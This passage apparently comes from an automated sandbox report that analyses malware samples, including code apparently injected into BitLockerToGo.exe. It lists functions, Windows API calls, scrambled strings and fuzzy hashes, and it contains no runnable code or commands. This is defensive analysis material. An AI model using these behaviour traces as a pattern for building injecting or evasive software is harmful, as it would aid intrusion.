GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042373B

Strings

VirtualProtect, xrefs: 00423704
, xrefs: 00423684

Memory Dump Source

Source File: 00000005.00000002.2175026422.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_416000_ssegbth.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: $VirtualProtect
API String ID: 1646373207-947944765
Opcode ID: e0e411ff4c247a5316448fc5701780ceddf569871ef39cf7942b1ea1165f1dde
Instruction ID: bdfdf514c03e345525c3e16444427038d7ddc4cf5038b4f5b94db7108e4316be
Opcode Fuzzy Hash: e0e411ff4c247a5316448fc5701780ceddf569871ef39cf7942b1ea1165f1dde
Instruction Fuzzy Hash: 2631651569C3C0D9F331CBA8BC857297B62AB11B14F54307AD9848B2F1D3FA056A836F

Function 0042470B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00424731

Part of subcall function 00424556: __fltout2.LIBCMT ref: 00424582

__cftog_l.LIBCMT ref: 00424757
__cftoe_l.LIBCMT ref: 00424789

Memory Dump Source

Source File: 00000005.00000002.2175026422.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_416000_ssegbth.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 29c8883dd3ed5d8ab0f45916fb4b7f0a01db229a1e75b3cb984d75e26a57ebf3
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 7511723210006DBBCF125F84EC41CEE3F26FB99354B998516FE2859131C33AC9B1AB85

Function 0042388D Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(0042840C,00000000,?,00000000), ref: 004238C7
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004238E1
HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004238FF
SetFileShortNameA.KERNEL32(00000000,00428428), ref: 0042390B

Memory Dump Source

Source File: 00000005.00000002.2175026422.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_416000_ssegbth.jbxd

Similarity

API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
String ID:
API String ID: 4071102102-0
Opcode ID: bb6f0e06b3ff5238140b2e68e598750acc13a1c451ee61dbf95c906f3602a2c7
Instruction ID: 54a63d936d2bb86c8b969f01a833e19422160a2cc5764942cb2e449c65f369aa
Opcode Fuzzy Hash: bb6f0e06b3ff5238140b2e68e598750acc13a1c451ee61dbf95c906f3602a2c7
Instruction Fuzzy Hash: E7015271304114AFDB20AB69FC49D6B73BCE785716B80003AF501D3151DA7C59468B6E

Analysis Process: E9D3.exePID: 8076, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1%
Total number of Nodes:	1001
Total number of Limit Nodes:	9

Executed Functions

Function 00007FF69DDB10F8 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_initterm.MSVCRT ref: 00007FF69DDB11CE
_initterm.MSVCRT ref: 00007FF69DDB1201

Strings

0, xrefs: 00007FF69DDB1108

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: _initterm
String ID: 0
API String ID: 4163712557-4108050209
Opcode ID: d0c91f69a36dc915e8c1dac5c1df33297561d19c6776b9ceb0e3a356a21a41d9
Instruction ID: c4889b5590473be3f663dc3abe46f750806ecc807dc6a04f229af941e27a9387
Opcode Fuzzy Hash: d0c91f69a36dc915e8c1dac5c1df33297561d19c6776b9ceb0e3a356a21a41d9
Instruction Fuzzy Hash: 4F51D375A19F0689FB208B56E89236833B0FB48BD8F1054B6DE9D977A4EF3CE4448350

Function 00007FF69DED4F94 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DED62FD), ref: 00007FF69DED4FEE

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 4435a1eed049c3fd0450f88751b0f5cfbfedae25248e736f52470c25bd2a7fc0
Instruction ID: 5cd7633e2b6149fc883785d3fdee420c0024837ab3b70a85843f85f6e7bbff92
Opcode Fuzzy Hash: 4435a1eed049c3fd0450f88751b0f5cfbfedae25248e736f52470c25bd2a7fc0
Instruction Fuzzy Hash: 61F03036629F8486DB60DB28E88142EB7A0F788794F501175EACE837B4EF2CD000CB00

Function 00007FF69DDB93C0 Relevance: 1.3, APIs: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF69DDB93E2

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 590cbdf70923415df278564712c069ad615679b58158710514d8b1ac31f48482
Instruction ID: 9367adf6b135a726302c7a4391fa6a1b61cfb087fa993cf3f3de7e1b489006d0
Opcode Fuzzy Hash: 590cbdf70923415df278564712c069ad615679b58158710514d8b1ac31f48482
Instruction Fuzzy Hash: C0314C22B7085007E7AC867A9C27B7B25C2DB95734B14A77DAA3BC7BE4ED2DC4010705

Function 00007FF69DF8D0A0 Relevance: 3.1, APIs: 2, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ismbblead.MSVCRT ref: 00007FF69DF8D10A
memset.MSVCRT ref: 00007FF69DF8D184

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: _ismbbleadmemset
String ID:
API String ID: 108173368-0
Opcode ID: 57671fdf5fd48d660e387b34f2550a08a233dfe26c6519ce1e1df74da0d6ba48
Instruction ID: 6e8d9f823708f252fc2737ae52b02b79a0991a25038d56b0c4f2f48842964de3
Opcode Fuzzy Hash: 57671fdf5fd48d660e387b34f2550a08a233dfe26c6519ce1e1df74da0d6ba48
Instruction Fuzzy Hash: 2E414B22F04B559EFB608B6698423BC3BB1EB01789F4440B6DE8D97B99EE29D241C301

Function 00007FF69DDB4B38 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF69DDB4A60: VirtualAlloc.KERNEL32 ref: 00007FF69DDB4A7C

CreateThread.KERNELBASE ref: 00007FF69DDB4BD9

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: AllocCreateThreadVirtual
String ID:
API String ID: 3065189322-0
Opcode ID: 1ecd6ee78ea127f867ce216758fd444255d4e149dd627d0958e958b074ace42d
Instruction ID: 9166e1e0d6d574dffdbc58c4a553b799acceae00b86aa7b5ca5f2cc0faf0f183
Opcode Fuzzy Hash: 1ecd6ee78ea127f867ce216758fd444255d4e149dd627d0958e958b074ace42d
Instruction Fuzzy Hash: 77318832A09B4585DB60CF15F84126AB3B4FB88B98F604276EACD87B64EF3CD445C740

Function 00007FF69DDB4A60 Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF69DDB4A7C

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a0c6ea1e1d0c3704b1dec8672d4d704532c0c620c3fc467061c89ee7592a08bd
Instruction ID: 5f465fbe73c3325aa42a48aa429b275fcc68cde077ef9b38ae6599b1fb7d8b6e
Opcode Fuzzy Hash: a0c6ea1e1d0c3704b1dec8672d4d704532c0c620c3fc467061c89ee7592a08bd
Instruction Fuzzy Hash: 9701FB22729B8586DB64CB65F45422AA7E4F788B98F101635EACE87B94EF3CC5108B00

Non-executed Functions

Function 00007FF69DDB8A80 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 425libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF69DDB8B3A
GetProcAddress.KERNEL32 ref: 00007FF69DDB90E5
ExitProcess.KERNEL32 ref: 00007FF69DDB914F

Strings

[i2T, xrefs: 00007FF69DDB8CB2

Memory Dump Source

Source File: 00000006.00000002.2665575154.00007FF69DDB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF69DDB0000, based on PE: true

Associated: 00000006.00000002.2665321721.00007FF69DDB0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665791454.00007FF69DF8F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665907862.00007FF69DF9D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69DFB5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2665947460.00007FF69E017000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2666354231.00007FF69E01B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff69ddb0000_E9D3.jbxd

Similarity

API ID: AddressProc$ExitProcess
String ID: [i2T
API String ID: 2636158824-4214777484
Opcode ID: 1a6331b62f209788087938028dd1075342753dd5ba018f8267dff905bf1da63a
Instruction ID: 37ab702d61b96e5f9f9e94cadd6b13b4f8351abba4280d86bcd050c246e252f1
Opcode Fuzzy Hash: 1a6331b62f209788087938028dd1075342753dd5ba018f8267dff905bf1da63a
Instruction Fuzzy Hash: D4F1CD63B21A914AF758CE7ADC516AE2AA3D7957A8F149334DD6EDBBD8DE3CC0014300

Analysis Process: BitLockerToGo.exePID: 7300, Parent PID: 4412COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.3%
Total number of Nodes:	92
Total number of Limit Nodes:	3

Executed Functions

Function 00E2AE50 Relevance: 35.5, APIs: 2, Strings: 18, Instructions: 508
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(AB4BA55F,00000000,00000800), ref: 00E2AEEF
GetProcessVersion.KERNELBASE(00000000), ref: 00E2B0F1

Strings

J9U;, xrefs: 00E2B177
aQcS, xrefs: 00E2B1A7
SaSc, xrefs: 00E2B1C7
z, xrefs: 00E2B2E3
]eVg, xrefs: 00E2B1CF
\)S+, xrefs: 00E2B157
\:, xrefs: 00E2B349
J%O', xrefs: 00E2B14F
yMxO, xrefs: 00E2B19F
oYh[, xrefs: 00E2B1B7
Xijk, xrefs: 00E2B1D7
,A'C, xrefs: 00E2B187
_1_3, xrefs: 00E2B167
Z=W?, xrefs: 00E2B17F
mUoW, xrefs: 00E2B1AF
M!W#, xrefs: 00E2B147
7EiG, xrefs: 00E2B18F
h]m_, xrefs: 00E2B1BF

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoadProcessVersion
String ID: ,A'C$7EiG$J%O'$J9U;$M!W#$SaSc$Xijk$Z=W?$\:$\)S+$]eVg$_1_3$aQcS$h]m_$mUoW$oYh[$yMxO$z
API String ID: 1829952579-2365601296
Opcode ID: 4d9e1dff49f569149bbf254834a725198e3e511458f571a64a58b484c32bd523
Instruction ID: e4cc8c14242cf7f4f2829114194bc5f8922d8c5b785a104196df4a01e4f5d870
Opcode Fuzzy Hash: 4d9e1dff49f569149bbf254834a725198e3e511458f571a64a58b484c32bd523
Instruction Fuzzy Hash: 620225B19083918FC310DF14EC916ABBBE1EF95748F18592CE8D56B262E3719909CB93

Function 00E5E372 Relevance: 5.5, Strings: 4, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00E5EBE6
6, xrefs: 00E5E730
X, xrefs: 00E5E711
gY<S, xrefs: 00E5E800

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$6$X$gY<S
API String ID: 0-1410579183
Opcode ID: 128f0a090e75f91a9e088def7be1ae38ed2dac7e7277ec4ae118ea048daafa2f
Instruction ID: f2dcd95b4be1e45bdf33ab5b9355ec1dcc580a75d07112d8fcb93ecd2f1aff5a
Opcode Fuzzy Hash: 128f0a090e75f91a9e088def7be1ae38ed2dac7e7277ec4ae118ea048daafa2f
Instruction Fuzzy Hash: 0902C2B2A582118FD709DF29DC9063EB7E2FB98341F1A4D2CD6C5A7360D7349A45CB82

Function 00E2B5B0 Relevance: 4.3, Strings: 3, Instructions: 584
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|qps, xrefs: 00E2B79A
hl`b, xrefs: 00E2B5C7
j, xrefs: 00E2BB9C

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: hl`b$j$|qps
API String ID: 0-2966681673
Opcode ID: ac64cb90b0236a38bb9948801bc5ab3c841e06109d556784a76f9f97435b1139
Instruction ID: 02c1085f634a0043d8358d3230024ec9e9e13115e58547ca529cc302257562f6
Opcode Fuzzy Hash: ac64cb90b0236a38bb9948801bc5ab3c841e06109d556784a76f9f97435b1139
Instruction Fuzzy Hash: 1322077250C3508FC314CF28D4903AFBBE2ABC5318F199B6DE4E96B395D77489058B82

Function 00E5DBC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00E2ED47,?,00000001,00000000), ref: 00E5DBEE

Strings

G, xrefs: 00E5DBD8

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: G
API String ID: 2994545307-4067352199
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00E5D7DE Relevance: 1.6, APIs: 1, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 00E5D92A

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 56c7b429c90fa70d6db684e1abd0b681b9a8cd85df1cf31d2c486d35da7c0116
Instruction ID: 2565847d39620488e8a8722786779eafecea6d3bbe5309f051d6333ab0ce3fdc
Opcode Fuzzy Hash: 56c7b429c90fa70d6db684e1abd0b681b9a8cd85df1cf31d2c486d35da7c0116
Instruction Fuzzy Hash: 213180B6740B029FD3148F6ACCC1361F7F2BB95311B189568D496DBB41C7B8E489CB80

Function 00E296E0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G, xrefs: 00E2973E
system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00E2988A
W, xrefs: 00E29726
R, xrefs: 00E2974E
M, xrefs: 00E29736
w, xrefs: 00E2972E
L, xrefs: 00E29746

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: G$L$M$R$W$system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways$w
API String ID: 0-1881237154
Opcode ID: 379ec18c3055bc772bdb2011b79029c9c9337140c6eed0ac27cc25834d65095c
Instruction ID: f38937fd74d066bd9bd290bf8997beaf3f42dfb0dd4303272fa759358f374d99
Opcode Fuzzy Hash: 379ec18c3055bc772bdb2011b79029c9c9337140c6eed0ac27cc25834d65095c
Instruction Fuzzy Hash: 014156704087918ED715AF38D54931ABFE0AF12324F089A5DE8E95F2D6D375C449C7A3

Function 00E298AA Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E2C5D0: FreeLibrary.KERNEL32(00E298AF), ref: 00E2C5D6

CoUninitialize.OLE32 ref: 00E298B3
CloseHandle.KERNEL32 ref: 00E298CF
ExitProcess.KERNEL32 ref: 00E298E6

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: CloseExitFreeHandleLibraryProcessUninitialize
String ID:
API String ID: 2277294503-0
Opcode ID: 4e57f76d105ae7cbb5326790f35f68ca790bfce820bd6c9094ecadadbd952bd0
Instruction ID: ed0765bd5ef7849b3a7a016d20522af376113e0d797408b4d5764a496f181270
Opcode Fuzzy Hash: 4e57f76d105ae7cbb5326790f35f68ca790bfce820bd6c9094ecadadbd952bd0
Instruction Fuzzy Hash: B8D09E7110C231CBE61C2770B9167BE36E06B12355F2D3426D443B5047DB748455A657

Function 00E29888 Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 00E298B3
CloseHandle.KERNEL32 ref: 00E298CF
ExitProcess.KERNEL32 ref: 00E298E6

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: CloseExitHandleProcessUninitialize
String ID:
API String ID: 935808947-0
Opcode ID: 96209cb305cb0e7c78ff27e45aea37a2cc6c9bbd7e0ce54b1bff4e46dabf76b5
Instruction ID: 2de7c9d48a5936a90bcddaa4ec25e2dc0a4d029b0bb307d4e7cd200af4d17c45
Opcode Fuzzy Hash: 96209cb305cb0e7c78ff27e45aea37a2cc6c9bbd7e0ce54b1bff4e46dabf76b5
Instruction Fuzzy Hash: D7D0C77110C131CBE71C2770B5157BD37E06B12355F1D3426D443B5047D7748455A657

Function 00E2987D Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 00E298B3
CloseHandle.KERNEL32 ref: 00E298CF
ExitProcess.KERNEL32 ref: 00E298E6

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: CloseExitHandleProcessUninitialize
String ID:
API String ID: 935808947-0
Opcode ID: c74c2e4f98bd087492481658287b135de1afcf3abb2f2c8c8cb50a2d0e5e38c1
Instruction ID: af1726b98bf078b501522abc44ab2ad4e278e8cb3bde995d36a986d7fcf3e188
Opcode Fuzzy Hash: c74c2e4f98bd087492481658287b135de1afcf3abb2f2c8c8cb50a2d0e5e38c1
Instruction Fuzzy Hash: 75D0C771108121CBE71C2770B5057AD37E05B11355F193425D443B1046D77484559657

Function 00E5DA17 Relevance: 3.0, APIs: 2, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 00E5DA17
GetLogicalDrives.KERNELBASE ref: 00E5DA22

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: e9de1b4fd68ff23c728c3079a73c58143852f68b6519a6fd31b068f3dc1ecfd3
Instruction ID: 8bf96eec79cfa2dfd9f603634b3ed7b21e0e36953eaec99794fa022663b26332
Opcode Fuzzy Hash: e9de1b4fd68ff23c728c3079a73c58143852f68b6519a6fd31b068f3dc1ecfd3
Instruction Fuzzy Hash: 38B00231109910CFC3443F66FD4A00A37A0AB50383B985475E4D1B5433AEE4546C8A11

Function 00E5BC30 Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00E5BCE1

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 28ec53073684a48ed1d827588e580ae439e1e7af3f1991f5334552f95f70515d
Instruction ID: ae871835e7a9a7b8077f0fa6222a9bcde3ed181bd3fab0bc3824abc97659c52f
Opcode Fuzzy Hash: 28ec53073684a48ed1d827588e580ae439e1e7af3f1991f5334552f95f70515d
Instruction Fuzzy Hash: 87112773A083049FD3048E69DCC2B5AFBE5EBD4358F04843DE458D7292DA75D8168B81

Function 00E5BD12 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00E5BDA3

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1ec666fbe107a60da2c316b13ae962e95a568a5e4d8110581bd788d0fca36205
Instruction ID: a51e9c738fcd3c53212add54738c5cdbfc6cbfd7f3f1b164103c25e34ec7ce9e
Opcode Fuzzy Hash: 1ec666fbe107a60da2c316b13ae962e95a568a5e4d8110581bd788d0fca36205
